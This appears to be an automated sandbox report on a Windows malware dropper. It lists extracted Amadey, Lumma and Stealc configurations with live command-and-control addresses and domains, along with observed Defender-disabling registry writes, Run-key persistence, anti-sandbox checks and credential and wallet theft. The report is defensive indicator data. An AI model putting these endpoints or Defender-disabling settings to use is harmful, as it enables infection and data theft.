Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2024 20:14
Static task
static1
Behavioral task
behavioral1
Sample
191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe
Resource
win10v2004-20241007-en
General
-
Target
191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe
-
Size
3.6MB
-
MD5
3bc888b63247898f10e270e0711ccca2
-
SHA1
342efb0b96606ddbe130fb362c24aa1661a72f33
-
SHA256
191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a
-
SHA512
0684c613bbbef78ccd2c127e305ad9115a4623e8a3617a1a2d88c925725fb1817674f7f5b9c5394e60759c655660a5723f8a07d80bd369e5951970e1b3d5f5a1
-
SSDEEP
98304:b5TOfP9BOxle7zesk/WLKmLNi4ZBjUYnFVzkBhOZOAj/P:YQlEesaJmLNFPj9r4uOOP
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 5dd3e2b4f1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 5dd3e2b4f1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 5dd3e2b4f1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 5dd3e2b4f1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 5dd3e2b4f1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 5dd3e2b4f1.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/5268-2156-0x00000000005C0000-0x00000000008C4000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4856 created 3404 4856 callmobile.exe 56 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c8776.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed5d6d0073.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 012ef94453.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5dd3e2b4f1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1p76f5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0tClIDb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6448 powershell.exe 6848 powershell.exe 2880 powershell.exe 1556 powershell.exe 2020 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c8776.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed5d6d0073.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5dd3e2b4f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5dd3e2b4f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1p76f5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0tClIDb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed5d6d0073.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 012ef94453.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c8776.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 012ef94453.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1p76f5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0tClIDb.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 1p76f5.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation sS6lYim.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Build.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 6452 cmd.exe 2620 powershell.exe -
Executes dropped EXE 26 IoCs
pid Process 560 1p76f5.exe 1712 skotes.exe 4928 2c8776.exe 4580 B3vKvPi.exe 4856 callmobile.exe 4452 0tClIDb.exe 4728 ed5d6d0073.exe 4980 012ef94453.exe 2536 af21b79d53.exe 2976 skotes.exe 528 5dd3e2b4f1.exe 544 sS6lYim.exe 3180 Wihnup.exe 5768 main.exe 3796 main.exe 1624 Build.exe 5476 hacn.exe 5700 hacn.exe 5564 based.exe 6440 based.exe 5932 Build.exe 4856 hacn.exe 5032 based.exe 6908 based.exe 6728 skotes.exe 7188 rar.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine ed5d6d0073.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 012ef94453.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 2c8776.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 0tClIDb.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 5dd3e2b4f1.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 1p76f5.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe -
Loads dropped DLL 37 IoCs
pid Process 3796 main.exe 3796 main.exe 5700 hacn.exe 5700 hacn.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 4856 hacn.exe 4856 hacn.exe 6908 based.exe 6440 based.exe 6908 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6908 based.exe 6908 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6440 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe 6908 based.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 5dd3e2b4f1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 5dd3e2b4f1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" B3vKvPi.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed5d6d0073.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013261001\\ed5d6d0073.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\012ef94453.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013262001\\012ef94453.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af21b79d53.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013263001\\af21b79d53.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5dd3e2b4f1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013264001\\5dd3e2b4f1.exe" skotes.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 256 discord.com 257 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 254 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023cb4-1301.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 6556 tasklist.exe 5300 tasklist.exe 5472 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 560 1p76f5.exe 1712 skotes.exe 4928 2c8776.exe 4452 0tClIDb.exe 4728 ed5d6d0073.exe 4980 012ef94453.exe 2976 skotes.exe 528 5dd3e2b4f1.exe 6728 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4856 set thread context of 5268 4856 callmobile.exe 174 -
resource yara_rule behavioral1/files/0x0007000000024496-5584.dat upx behavioral1/memory/3796-5588-0x00007FFAEAA90000-0x00007FFAEB07E000-memory.dmp upx behavioral1/files/0x0007000000024493-5598.dat upx behavioral1/files/0x0007000000024492-5597.dat upx behavioral1/files/0x0007000000024491-5596.dat upx behavioral1/files/0x0007000000024490-5595.dat upx behavioral1/files/0x000700000002448f-5594.dat upx behavioral1/files/0x0007000000024498-5593.dat upx behavioral1/files/0x0007000000024497-5592.dat upx behavioral1/files/0x0007000000024495-5591.dat upx behavioral1/memory/5700-5632-0x00007FFAF3510000-0x00007FFAF397A000-memory.dmp upx behavioral1/memory/6440-5655-0x00007FFAEAA90000-0x00007FFAEB07E000-memory.dmp upx behavioral1/memory/6440-5660-0x00007FFB0C200000-0x00007FFB0C20F000-memory.dmp upx behavioral1/memory/6440-5659-0x00007FFB07420000-0x00007FFB07444000-memory.dmp upx behavioral1/memory/4856-5682-0x00007FFAF3510000-0x00007FFAF397A000-memory.dmp upx behavioral1/memory/6440-5691-0x00007FFB073F0000-0x00007FFB0741D000-memory.dmp upx behavioral1/memory/6440-5690-0x00007FFAF3140000-0x00007FFAF32B6000-memory.dmp upx behavioral1/memory/6440-5695-0x00007FFB061B0000-0x00007FFB061BD000-memory.dmp upx behavioral1/memory/6440-5694-0x00007FFB060F0000-0x00007FFB06109000-memory.dmp upx behavioral1/memory/6440-5703-0x00007FFAF2F50000-0x00007FFAF306C000-memory.dmp upx behavioral1/memory/6908-5751-0x00007FFB01970000-0x00007FFB019A3000-memory.dmp upx behavioral1/memory/6440-5765-0x00007FFAF3070000-0x00007FFAF313D000-memory.dmp upx behavioral1/memory/6440-5851-0x00007FFB02720000-0x00007FFB02753000-memory.dmp upx behavioral1/memory/4856-5862-0x00007FFAF3510000-0x00007FFAF397A000-memory.dmp upx behavioral1/memory/6440-5764-0x00007FFAEB8D0000-0x00007FFAEBDF2000-memory.dmp upx behavioral1/memory/6440-5763-0x00007FFB060F0000-0x00007FFB06109000-memory.dmp upx behavioral1/memory/6908-5750-0x00007FFB021D0000-0x00007FFB021DD000-memory.dmp upx behavioral1/memory/6908-5749-0x00007FFB02070000-0x00007FFB02089000-memory.dmp upx behavioral1/memory/6908-5748-0x00007FFAF2DD0000-0x00007FFAF2F46000-memory.dmp upx behavioral1/memory/6908-5747-0x00007FFB02090000-0x00007FFB020B3000-memory.dmp upx behavioral1/memory/6908-5746-0x00007FFB021E0000-0x00007FFB0220D000-memory.dmp upx behavioral1/memory/6908-5745-0x00007FFB0BF40000-0x00007FFB0BF4F000-memory.dmp upx behavioral1/memory/6908-5744-0x00007FFB02760000-0x00007FFB02784000-memory.dmp upx behavioral1/memory/6908-5743-0x00007FFAF27D0000-0x00007FFAF289D000-memory.dmp upx behavioral1/memory/6908-5742-0x00007FFAE6D50000-0x00007FFAE7272000-memory.dmp upx behavioral1/memory/6908-5741-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp upx behavioral1/memory/6908-5740-0x00007FFB026C0000-0x00007FFB026D9000-memory.dmp upx behavioral1/memory/6908-5725-0x00007FFB02060000-0x00007FFB0206D000-memory.dmp upx behavioral1/memory/6908-5724-0x00007FFB01950000-0x00007FFB01964000-memory.dmp upx behavioral1/memory/6440-5723-0x00007FFAF3140000-0x00007FFAF32B6000-memory.dmp upx behavioral1/memory/6440-5722-0x00007FFB02790000-0x00007FFB027B3000-memory.dmp upx behavioral1/memory/6908-5721-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp upx behavioral1/memory/6908-5720-0x00007FFAF27D0000-0x00007FFAF289D000-memory.dmp upx behavioral1/memory/6908-5719-0x00007FFAE6D50000-0x00007FFAE7272000-memory.dmp upx behavioral1/memory/6908-5718-0x00007FFB01970000-0x00007FFB019A3000-memory.dmp upx behavioral1/memory/6908-5717-0x00007FFB021D0000-0x00007FFB021DD000-memory.dmp upx behavioral1/memory/6908-5716-0x00007FFB02070000-0x00007FFB02089000-memory.dmp upx behavioral1/memory/4856-5715-0x00007FFAF3510000-0x00007FFAF397A000-memory.dmp upx behavioral1/memory/6440-5714-0x00007FFB07420000-0x00007FFB07444000-memory.dmp upx behavioral1/memory/6908-5713-0x00007FFB026C0000-0x00007FFB026D9000-memory.dmp upx behavioral1/memory/6908-5712-0x00007FFAF2DD0000-0x00007FFAF2F46000-memory.dmp upx behavioral1/memory/6908-5711-0x00007FFB02090000-0x00007FFB020B3000-memory.dmp upx behavioral1/memory/6908-5710-0x00007FFB021E0000-0x00007FFB0220D000-memory.dmp upx behavioral1/memory/6440-5708-0x00007FFAEAA90000-0x00007FFAEB07E000-memory.dmp upx behavioral1/memory/6440-5702-0x00007FFB02710000-0x00007FFB0271D000-memory.dmp upx behavioral1/memory/6440-5701-0x00007FFB026E0000-0x00007FFB026F4000-memory.dmp upx behavioral1/memory/6440-5698-0x00007FFB02720000-0x00007FFB02753000-memory.dmp upx behavioral1/memory/6440-5697-0x00007FFAF3070000-0x00007FFAF313D000-memory.dmp upx behavioral1/memory/6440-5696-0x00007FFAEB8D0000-0x00007FFAEBDF2000-memory.dmp upx behavioral1/memory/6908-5693-0x00007FFB0BF40000-0x00007FFB0BF4F000-memory.dmp upx behavioral1/memory/6908-5692-0x00007FFB02760000-0x00007FFB02784000-memory.dmp upx behavioral1/memory/6440-5689-0x00007FFB02790000-0x00007FFB027B3000-memory.dmp upx behavioral1/memory/6440-5688-0x00007FFB061C0000-0x00007FFB061D9000-memory.dmp upx behavioral1/memory/6908-5687-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1p76f5.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000c0000000234f9-5560.dat pyinstaller behavioral1/files/0x000900000002448e-5607.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 4016 4928 WerFault.exe 87 5096 4928 WerFault.exe 87 2912 4452 WerFault.exe 105 1516 4452 WerFault.exe 105 2060 4728 WerFault.exe 112 1952 4728 WerFault.exe 112 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1p76f5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5dd3e2b4f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language callmobile.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed5d6d0073.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 012ef94453.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language af21b79d53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sS6lYim.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wihnup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0tClIDb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c8776.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language af21b79d53.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage af21b79d53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2028 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5952 WMIC.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 7472 systeminfo.exe -
Kills process with taskkill 19 IoCs
pid Process 7660 taskkill.exe 7748 taskkill.exe 7880 taskkill.exe 7532 taskkill.exe 5468 taskkill.exe 1548 taskkill.exe 7212 taskkill.exe 7444 taskkill.exe 5172 taskkill.exe 2940 taskkill.exe 3432 taskkill.exe 7836 taskkill.exe 7984 taskkill.exe 4400 taskkill.exe 7200 taskkill.exe 5064 taskkill.exe 3428 taskkill.exe 3496 taskkill.exe 7428 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133781625709873216" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2356 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 560 1p76f5.exe 560 1p76f5.exe 1712 skotes.exe 1712 skotes.exe 4928 2c8776.exe 4928 2c8776.exe 4452 0tClIDb.exe 4452 0tClIDb.exe 4728 ed5d6d0073.exe 4728 ed5d6d0073.exe 4980 012ef94453.exe 4980 012ef94453.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 2976 skotes.exe 2976 skotes.exe 528 5dd3e2b4f1.exe 528 5dd3e2b4f1.exe 2536 af21b79d53.exe 2536 af21b79d53.exe 528 5dd3e2b4f1.exe 528 5dd3e2b4f1.exe 528 5dd3e2b4f1.exe 6280 msedge.exe 6280 msedge.exe 5540 msedge.exe 5540 msedge.exe 5532 chrome.exe 5532 chrome.exe 4856 callmobile.exe 4856 callmobile.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 5268 MSBuild.exe 6728 skotes.exe 6728 skotes.exe 2880 powershell.exe 2880 powershell.exe 6848 powershell.exe 6848 powershell.exe 6448 powershell.exe 6448 powershell.exe 2620 powershell.exe 2620 powershell.exe 7464 powershell.exe 7464 powershell.exe 2620 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5540 msedge.exe 5540 msedge.exe 5532 chrome.exe 5532 chrome.exe 5540 msedge.exe 5532 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4856 callmobile.exe Token: SeDebugPrivilege 2940 taskkill.exe Token: SeDebugPrivilege 4400 taskkill.exe Token: SeDebugPrivilege 3428 taskkill.exe Token: SeDebugPrivilege 3432 taskkill.exe Token: SeDebugPrivilege 1548 taskkill.exe Token: SeDebugPrivilege 4560 firefox.exe Token: SeDebugPrivilege 4560 firefox.exe Token: SeDebugPrivilege 528 5dd3e2b4f1.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeDebugPrivilege 4856 callmobile.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeDebugPrivilege 5268 MSBuild.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe 